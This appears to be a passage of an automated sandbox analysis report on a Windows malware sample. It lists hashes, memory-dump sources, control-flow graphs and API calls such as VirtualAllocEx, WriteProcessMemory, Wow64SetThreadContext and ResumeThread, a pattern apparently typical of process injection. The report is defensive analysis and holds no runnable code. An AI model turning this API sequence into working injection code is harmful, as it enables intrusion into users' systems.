                                                          • Instruction Fuzzy Hash: 831275B18017468BE710EF65F94C289BBB1FB46328F70C609D2616F2E9DBB8154ACF44
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eec9c70ac7b20a5c915b88a9ca4a2d284171d27c683c69c3fd800ec5d5679f9
                                                          • Instruction ID: af5ed0368b60791b6cbef4d08c3673185c9f0a250c98899a3fe40f60deedca55
                                                          • Opcode Fuzzy Hash: 0eec9c70ac7b20a5c915b88a9ca4a2d284171d27c683c69c3fd800ec5d5679f9
                                                          • Instruction Fuzzy Hash: B1C1E7B18017468BE714EF65F94C289BBB1FB86324F718709D2616F2E8DBB8154ACF44

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 64e1dd0-64e1ee4 1 64e1f1e-64e1f96 0->1 2 64e1ee6-64e1f0d 0->2 3 64e1f98-64e1f9e 1->3 4 64e1fa1-64e1fa8 1->4 5 64e1f15-64e1f16 2->5 17 64e1f10 call 64e1f30 2->17 18 64e1f10 call 64e1dd0 2->18 3->4 6 64e1faa-64e1fb0 4->6 7 64e1fb3-64e2052 CreateWindowExW 4->7 6->7 9 64e205b-64e2093 7->9 10 64e2054-64e205a 7->10 14 64e2095-64e2098 9->14 15 64e20a0 9->15 10->9 14->15 16 64e20a1 15->16 16->16 17->5 18->5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4f6a16b9762a806c337b620e1ec5b14a4ecf5523351f94fa56c9f182b7c9c5c
                                                          • Instruction ID: 0de55a6a096bb42d2764d169cfec608355b6a5d2aa3f11aa9a4e5fc2d081f67b
                                                          • Opcode Fuzzy Hash: d4f6a16b9762a806c337b620e1ec5b14a4ecf5523351f94fa56c9f182b7c9c5c
                                                          • Instruction Fuzzy Hash: D3915C71C09389AFCB16CFA5C850ACEBFB5EF4A300F15859BE444EB262C3749945CBA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 19 7cf64e4-7cf6585 22 7cf65be-7cf65de 19->22 23 7cf6587-7cf6591 19->23 30 7cf6617-7cf6646 22->30 31 7cf65e0-7cf65ea 22->31 23->22 24 7cf6593-7cf6595 23->24 25 7cf65b8-7cf65bb 24->25 26 7cf6597-7cf65a1 24->26 25->22 28 7cf65a5-7cf65b4 26->28 29 7cf65a3 26->29 28->28 32 7cf65b6 28->32 29->28 37 7cf667f-7cf6739 CreateProcessA 30->37 38 7cf6648-7cf6652 30->38 31->30 33 7cf65ec-7cf65ee 31->33 32->25 35 7cf6611-7cf6614 33->35 36 7cf65f0-7cf65fa 33->36 35->30 39 7cf65fe-7cf660d 36->39 40 7cf65fc 36->40 51 7cf673b-7cf6741 37->51 52 7cf6742-7cf67c8 37->52 38->37 41 7cf6654-7cf6656 38->41 39->39 42 7cf660f 39->42 40->39 43 7cf6679-7cf667c 41->43 44 7cf6658-7cf6662 41->44 42->35 43->37 46 7cf6666-7cf6675 44->46 47 7cf6664 44->47 46->46 48 7cf6677 46->48 47->46 48->43 51->52 62 7cf67ca-7cf67ce 52->62 63 7cf67d8-7cf67dc 52->63 62->63 64 7cf67d0 62->64 65 7cf67de-7cf67e2 63->65 66 7cf67ec-7cf67f0 63->66 64->63 65->66 67 7cf67e4 65->67 68 7cf67f2-7cf67f6 66->68 69 7cf6800-7cf6804 66->69 67->66 68->69 70 7cf67f8 68->70 71 7cf6816-7cf681d 69->71 72 7cf6806-7cf680c 69->72 70->69 73 7cf681f-7cf682e 71->73 74 7cf6834 71->74 72->71 73->74 76 7cf6835 74->76 76->76
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CF6726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: da8d456932d86b24f9da97528b061cdb21682715383296238bb8c37373b7649a
                                                          • Instruction ID: fb6259186f70b5915842968a4be0886969cc22035da1d65ff17663624def687e
                                                          • Opcode Fuzzy Hash: da8d456932d86b24f9da97528b061cdb21682715383296238bb8c37373b7649a
                                                          • Instruction Fuzzy Hash: 63A15BB1D0061ADFEB24CF68C881BEDBBB2BB44310F148569E948B7240DB749A85CF91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 77 7cf64f0-7cf6585 79 7cf65be-7cf65de 77->79 80 7cf6587-7cf6591 77->80 87 7cf6617-7cf6646 79->87 88 7cf65e0-7cf65ea 79->88 80->79 81 7cf6593-7cf6595 80->81 82 7cf65b8-7cf65bb 81->82 83 7cf6597-7cf65a1 81->83 82->79 85 7cf65a5-7cf65b4 83->85 86 7cf65a3 83->86 85->85 89 7cf65b6 85->89 86->85 94 7cf667f-7cf6739 CreateProcessA 87->94 95 7cf6648-7cf6652 87->95 88->87 90 7cf65ec-7cf65ee 88->90 89->82 92 7cf6611-7cf6614 90->92 93 7cf65f0-7cf65fa 90->93 92->87 96 7cf65fe-7cf660d 93->96 97 7cf65fc 93->97 108 7cf673b-7cf6741 94->108 109 7cf6742-7cf67c8 94->109 95->94 98 7cf6654-7cf6656 95->98 96->96 99 7cf660f 96->99 97->96 100 7cf6679-7cf667c 98->100 101 7cf6658-7cf6662 98->101 99->92 100->94 103 7cf6666-7cf6675 101->103 104 7cf6664 101->104 103->103 105 7cf6677 103->105 104->103 105->100 108->109 119 7cf67ca-7cf67ce 109->119 120 7cf67d8-7cf67dc 109->120 119->120 121 7cf67d0 119->121 122 7cf67de-7cf67e2 120->122 123 7cf67ec-7cf67f0 120->123 121->120 122->123 124 7cf67e4 122->124 125 7cf67f2-7cf67f6 123->125 126 7cf6800-7cf6804 123->126 124->123 125->126 127 7cf67f8 125->127 128 7cf6816-7cf681d 126->128 129 7cf6806-7cf680c 126->129 127->126 130 7cf681f-7cf682e 128->130 131 7cf6834 128->131 129->128 130->131 133 7cf6835 131->133 133->133
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CF6726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: a6d91949094759d8764140f924db463affe5a5ee11084801db69362a12e15be8
                                                          • Instruction ID: ad0bdd70c5e7bb6674112dcc9dd88aca653e0ec79705e29fc51df8660d936f46
                                                          • Opcode Fuzzy Hash: a6d91949094759d8764140f924db463affe5a5ee11084801db69362a12e15be8
                                                          • Instruction Fuzzy Hash: 90915CB1D0071ADFEB24CF68C881B9DBBB2BB44310F148569E948B7240DB759A85CF91

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 018FB69E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: a35c6424a866356f70878f24be23c915aca740be1a4fa9699a92c3bf2aff50f6
                                                          • Instruction ID: 0b5fbb4c9b0d528f31b473107e1ad2dcf62d33bcebaf62ab462032ca7539c55c
                                                          • Opcode Fuzzy Hash: a35c6424a866356f70878f24be23c915aca740be1a4fa9699a92c3bf2aff50f6
                                                          • Instruction Fuzzy Hash: 7A814670A00B058FEB24DF2AD04575ABBF1FF88314F10892DE58ADBA50D739E906CB91

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064E2042
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 91f53c1d499add03a6d2af07f23ee680a4e142ee82bcc0103433c2f0243e183a
                                                          • Instruction ID: 7ea5398393fb55140994a59d1f2b63db5f1468e92f37993249041e9432e02526
                                                          • Opcode Fuzzy Hash: 91f53c1d499add03a6d2af07f23ee680a4e142ee82bcc0103433c2f0243e183a
                                                          • Instruction Fuzzy Hash: 1041C2B1D003499FDB14CF9AC884ADEFBB6FF48310F64812AE918AB250D775A945CF90

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 018F60D1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 6e5be4490c8cb2e478d9eb201fe3bd5a6fe57bfdd7928a0bcdf90f5de778316f
                                                          • Instruction ID: 4a5185d2d200710f18c17c6790b216ab7dfcff998641b01efa72fc08e19d6e44
                                                          • Opcode Fuzzy Hash: 6e5be4490c8cb2e478d9eb201fe3bd5a6fe57bfdd7928a0bcdf90f5de778316f
                                                          • Instruction Fuzzy Hash: 7741BF71C00719CBEB24DFAAC844B9DBBB5BF89304F20816AD508AB251EB756946CF90

                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 064E4731
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5fa844a3baa6aaad927a8f92f521fe1c4573cb8a8d478931755d20d85ae6a7c8
                                                          • Instruction ID: 99c9e5e4e73a28793458d3a5e3fca97f30137a5f7c67506299eb63d706326fde
                                                          • Opcode Fuzzy Hash: 5fa844a3baa6aaad927a8f92f521fe1c4573cb8a8d478931755d20d85ae6a7c8
                                                          • Instruction Fuzzy Hash: 854147B89003098FDB14DF99C488AAABBF5FF88315F24C459D519AB361C774A841CFA0

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 018F60D1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: a3af629e4a3606de244455704c4bf8cf2bf8c201de8c245ec3aea1df8dd85cf7
                                                          • Instruction ID: 373aea5fdec9e647ea1b2ee70703a47354c57e98dc866a26c49941a743ea0659
                                                          • Opcode Fuzzy Hash: a3af629e4a3606de244455704c4bf8cf2bf8c201de8c245ec3aea1df8dd85cf7
                                                          • Instruction Fuzzy Hash: 5241B0B5C00719CBEB24DFAAC844B9DFBF1BF48304F24816AD508AB251EB75694ACF50

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0650E658
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301819183.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_6500000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 8eb3badd18236f372b0cf917b4d58a280d2f8f43d808700632199b115a8fb0a2
                                                          • Instruction ID: db73a4e8ffb51820fcd2b4e00113c7c5522d4f7b06d98ebbc8372fefde1b9f04
                                                          • Opcode Fuzzy Hash: 8eb3badd18236f372b0cf917b4d58a280d2f8f43d808700632199b115a8fb0a2
                                                          • Instruction Fuzzy Hash: 43319CB5D003498FDB50DF99D845AEEBBF4FF48310F148819E524A7291D7349901CFA1

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 904a9e8179f1239a3f732dc5e340a257d076ab7bc4adbd463de8bfbfad467d85
                                                          • Instruction ID: d9c7dd53c9d1a44e5d1f09bfac5283f7cc82562a61b32de3a278aa9982a0a287
                                                          • Opcode Fuzzy Hash: 904a9e8179f1239a3f732dc5e340a257d076ab7bc4adbd463de8bfbfad467d85
                                                          • Instruction Fuzzy Hash: E0313DB8A81352CFF724EFA1F4597693BA9FB88710F10842AEA058B3D5DB785901CF54

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CF62F8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 625e741be4eb657100d0d5df1ddb38de27eed133ff3253b9eb439e02b2cf11d4
                                                          • Instruction ID: 149c7b86cceba6160d0b3d10a8124024f70f5676aa3dcf043eb972e0b272f07b
                                                          • Opcode Fuzzy Hash: 625e741be4eb657100d0d5df1ddb38de27eed133ff3253b9eb439e02b2cf11d4
                                                          • Instruction Fuzzy Hash: 23216BB5D003499FDB10CFAAC881BDEBBF5FF48314F108429E918A7240C7789945CBA1

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07CF62F8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: c774c4a42881393a7b4d5d2f0bd882f835189155e3f73c812c3cfcc209daf315
                                                          • Instruction ID: 2a27991a4328005f641fe2d383b7751c759163efd6516555cc4cc56973188046
                                                          • Opcode Fuzzy Hash: c774c4a42881393a7b4d5d2f0bd882f835189155e3f73c812c3cfcc209daf315
                                                          • Instruction Fuzzy Hash: 642169B1D003499FDB10CFAAC881BDEBBF5FF48310F108429E918A7240C7789945CBA0

                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07CF5D16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 1cde6ed3d3bf8c28201ced418fc7986db8cce94bb569cfed43864927866f9b16
                                                          • Instruction ID: ea4bdfb70566d4713f4d2b510d465000ae683ccaeb57f6dda3ef806466379e4a
                                                          • Opcode Fuzzy Hash: 1cde6ed3d3bf8c28201ced418fc7986db8cce94bb569cfed43864927866f9b16
                                                          • Instruction Fuzzy Hash: C82136B1D003099FDB10DFAAC485BEEBBF5AF48220F14842AD519A7280CB789945CBA0

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CF63D8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 36d9a9563c117dcd87672d721c7d8d88cb51587a017307e20cf5f1c15dcc2556
                                                          • Instruction ID: 24ce1a32c6496936b1e94773d0ab2268d9a84e2af3a20b0134096c0644339e4f
                                                          • Opcode Fuzzy Hash: 36d9a9563c117dcd87672d721c7d8d88cb51587a017307e20cf5f1c15dcc2556
                                                          • Instruction Fuzzy Hash: 552107B5C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7250C7759545CBA5

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FDCD6,?,?,?,?,?), ref: 018FDD97
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: c27ef5bcb42acc7a95db2f2c492482603a858fd14f60c628897ab97306008b10
                                                          • Instruction ID: 9663c1893f87e58178918ffab0515c4db0d217ede02cfa0d370f95e626cd3ce2
                                                          • Opcode Fuzzy Hash: c27ef5bcb42acc7a95db2f2c492482603a858fd14f60c628897ab97306008b10
                                                          • Instruction Fuzzy Hash: 5D2103B5D00349AFDB10DF9AD884AEEBBF4EB48310F14841AEA18A3350D375A944CFA0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07CF5D16
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 674266a7102935394e124d1c112bdba9d471fe09492825e3f874df80a16177c9
                                                          • Instruction ID: 86e942fcfec39f64f23830c3257126c85fad2d0915c3f4deab8be67d7c70435e
                                                          • Opcode Fuzzy Hash: 674266a7102935394e124d1c112bdba9d471fe09492825e3f874df80a16177c9
                                                          • Instruction Fuzzy Hash: 8F2149B1D003099FDB10DFAAC4857EEBBF5EF48320F54842AD559A7240CB789945CFA0
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07CF63D8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: f9de31ffc4e0bb9e99439bf32d5317816838af0311b1d6cbe5889b446f2fd2b5
                                                          • Instruction ID: 6bae6e99f6e05d5e9650e0664f6bbf5a860d0f51da22559a3f488b648d36d208
                                                          • Opcode Fuzzy Hash: f9de31ffc4e0bb9e99439bf32d5317816838af0311b1d6cbe5889b446f2fd2b5
                                                          • Instruction Fuzzy Hash: D52116B1C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7240C7799945CBA0
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018FDCD6,?,?,?,?,?), ref: 018FDD97
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 3e79f61c2ccb91c5d6dbbc6032607f39e164d1e39b9b141b1ad77ebf9d129bce
                                                          • Instruction ID: 4cec637a02c35dded69ff451a399b5b847c234d7f2a277be2fb53b97c09c209e
                                                          • Opcode Fuzzy Hash: 3e79f61c2ccb91c5d6dbbc6032607f39e164d1e39b9b141b1ad77ebf9d129bce
                                                          • Instruction Fuzzy Hash: 4E21F2B5D002099FDB10CF9AD585ADEBBF4EB08310F14841AE914A3250D374AA40CF60
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CF6216
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 4a027324b7efad2779c73c6dc00da8e80343769e625da87ff30640009d6a8189
                                                          • Instruction ID: ae12c6d7e665664dd477635e3e97b33ee1e5f65a71ff80e7cb26af9fabaa894f
                                                          • Opcode Fuzzy Hash: 4a027324b7efad2779c73c6dc00da8e80343769e625da87ff30640009d6a8189
                                                          • Instruction Fuzzy Hash: BE1133759003499BDB20DFAAC845BEEBBF5EB48320F208819E915A7250CB75A940CBA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 12f4ae274065397ce60629d4d0bb6a958220aa4bf61de01aeea7595d6f44c3b1
                                                          • Instruction ID: 8ca9f93590e2e26c0cae6c29b27dfef5c5d5e35ed5b1d2f11d482cfbf992b2be
                                                          • Opcode Fuzzy Hash: 12f4ae274065397ce60629d4d0bb6a958220aa4bf61de01aeea7595d6f44c3b1
                                                          • Instruction Fuzzy Hash: 921149B1D003498FDB24DFAAD8457EEFBF5EB48320F248419D519A7640CA79A941CBA4
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018FB719,00000800,00000000,00000000), ref: 018FB90A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 5632893fda051b9658d23a6a72ba03d64ab8ea9bde7f7842389a14234f0e7169
                                                          • Instruction ID: c01eefd7edbbc79e466e1712712d2fe053558f41867523f9f16308ab1b03d1fb
                                                          • Opcode Fuzzy Hash: 5632893fda051b9658d23a6a72ba03d64ab8ea9bde7f7842389a14234f0e7169
                                                          • Instruction Fuzzy Hash: CE1103B6D003499FDB20DF9AC444B9EFBF4EB88310F10842EDA19A7240C375A945CFA4
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CF6216
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: e1d78039358d03395f1287df62d5a444c909f397c873e8d24a36e91ecae10070
                                                          • Instruction ID: 2f950dc13ed71daa5a79b9640bb18e9e9a825e867281fde484d0d173795a1e6d
                                                          • Opcode Fuzzy Hash: e1d78039358d03395f1287df62d5a444c909f397c873e8d24a36e91ecae10070
                                                          • Instruction Fuzzy Hash: 1E112671D003499FDB20DFAAC845BDEBBF5EF48320F148819E515A7250CB75A941CFA1
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018FB719,00000800,00000000,00000000), ref: 018FB90A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 6bf6bd108e244e3b50f0aef684f3f61cef724e7e552928e8d09d393d15a01546
                                                          • Instruction ID: 14f75c3e92872b077f1bbb45462870fe7df78f76141b0ab6a1241f328a6b2213
                                                          • Opcode Fuzzy Hash: 6bf6bd108e244e3b50f0aef684f3f61cef724e7e552928e8d09d393d15a01546
                                                          • Instruction Fuzzy Hash: 1A1100B6D003098FDB20CF9AC444B9EFBF4AF48310F10842ED919A7240C379AA45CFA4
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07CF8D6D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 3dc650277c062e0054f04f97ae3b199d979b22c26bd65e635c9ec2ca54d6195a
                                                          • Instruction ID: b1d596046b04bd5ff43d150b1e30d9030bdc32885e0ee3c92b0122fa44b56fff
                                                          • Opcode Fuzzy Hash: 3dc650277c062e0054f04f97ae3b199d979b22c26bd65e635c9ec2ca54d6195a
                                                          • Instruction Fuzzy Hash: BD1103B58003499FDB20DF9AD885BDEFFF8EB48320F10841AE518A7640C375A944CFA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e14ef87fdd6afd197ae368335be0314bd651ed55f7004513a808cb743eeb8108
                                                          • Instruction ID: e4f876e6eb4d811afd5db79ab588f18161fa960e12818015b8b7b4cc419f6987
                                                          • Opcode Fuzzy Hash: e14ef87fdd6afd197ae368335be0314bd651ed55f7004513a808cb743eeb8108
                                                          • Instruction Fuzzy Hash: 61113AB1D003498FDB24DFAAC44579EFBF5EF48324F148419D559A7240CB75A941CFA4
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07CF8D6D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
